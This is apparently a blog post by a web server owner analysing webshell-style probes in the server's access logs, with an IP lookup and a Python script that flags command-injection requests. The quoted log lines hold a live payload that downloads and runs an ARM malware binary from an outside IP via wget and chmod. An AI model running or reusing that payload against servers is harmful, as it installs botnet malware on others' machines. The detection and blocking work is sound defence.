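[Windows 10] About an HTTP server hit by webshell attacks
1. Background
I deployed a web server on Alibaba Cloud's public network. Recently, customers reported that my service kept going down. When I checked the backend logs, I found attacks from * IP addresses.
For example: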
209.141.56.212 - - [17/Sep/2021 04:52:04] "[33mGET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\/154.16.118.104/arm7;chmod+777+arm7;./arm7+0day.jawsv3;wget+http:/\/154.16.118.104/arm;chmod+777+arm;./arm+0day.jawsv3 HTTP/1.1[0m" 404 -
As shown in the screenshot below:
2. IP address lookup
I use the IP address database lookup from Teacher Ma's company (Taobao):
https://ip.taobao.com/?spm=a2c4g.11186623.0.0.2f953788CNPh0g
For example, look up the suspicious IP from the log below:
209.141.56.212
3. Suspicious request IPs
209.141.56.212
209.141.56.212 - - [17/Sep/2021 05:29:09] "[33mGET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\/154.16.118.104/arm7;chmod+777+arm7;./arm7+0day.jawsv3;wget+http:/\/154.16.118.104/arm;chmod+777+arm;./arm+0day.jawsv3 HTTP/1.1[0m" 404 -
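
One way to pull such suspicious IPs out of the access log automatically, as an added example that is not part of the original post. The regexes, function names and command list are assumptions, and the sample log lines are constructed with documentation-range addresses in the same format as the entries above.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Access-log format shown above: ip - - [timestamp] "METHOD target HTTP/x.y" status -
# The optional \x1b?\[\d+m groups absorb terminal colour codes such as [33m and [0m.
LOG_RE = re.compile(
    r'^(?P<ip>\d{1,3}(?:\.\d{1,3}){3}) - - \[(?P<ts>[^\]]+)\] '
    r'"(?:\x1b?\[\d+m)?(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+(?:\x1b?\[\d+m)?" '
    r'(?P<status>\d{3})\b'
)
# Shell chaining characters that have no business in a normal query string.
CHAIN_RE = re.compile(r'[;|`]|\$\(|&&')
# A command name at the start of the query or right after a separator (assumed list).
CMD_RE = re.compile(r'(?:^|[;|`\s])(?:wget|curl|chmod|rm|cd|sh|bash|tftp)\s', re.I)

# Constructed sample lines (documentation addresses, not taken from a real log).
SAMPLE_LOG = [
    '203.0.113.7 - - [17/Sep/2021 04:52:04] "[33mGET /shell?cd+/tmp;rm+arm7;wget+http://198.51.100.9/arm7;chmod+777+arm7 HTTP/1.1[0m" 404 -',
    '203.0.113.7 - - [17/Sep/2021 05:29:09] "[33mGET /shell?cd+/tmp;rm+arm7;wget+http://198.51.100.9/arm7;chmod+777+arm7 HTTP/1.1[0m" 404 -',
    '192.0.2.10 - - [17/Sep/2021 05:30:00] "GET /index.html HTTP/1.1" 200 -',
    '192.0.2.10 - - [17/Sep/2021 05:31:12] "GET /search?q=rm+old+files&page=2 HTTP/1.1" 200 -',
]

def is_command_injection(target):
    """Heuristic: the decoded query holds shell chaining characters and a command name."""
    _, _, query = target.partition('?')
    decoded = unquote_plus(query)  # '+' becomes a space, %xx escapes are decoded
    return bool(CHAIN_RE.search(decoded) and CMD_RE.search(decoded))

def suspicious_ips(lines):
    """Return a Counter mapping source IP to its number of injection-style requests."""
    hits = Counter()
    for line in lines:
        m = LOG_RE.match(line)
        if m and is_command_injection(m.group('target')):
            hits[m.group('ip')] += 1
    return hits

if __name__ == '__main__':
    for ip, count in suspicious_ips(SAMPLE_LOG).most_common():
        print(f'{ip}\t{count} suspicious request(s)')
```

The resulting IP list can be fed into a cloud security group or firewall deny rule; the 404 status on these requests shows the server has no `/shell` endpoint, so they are probes rather than successful command execution.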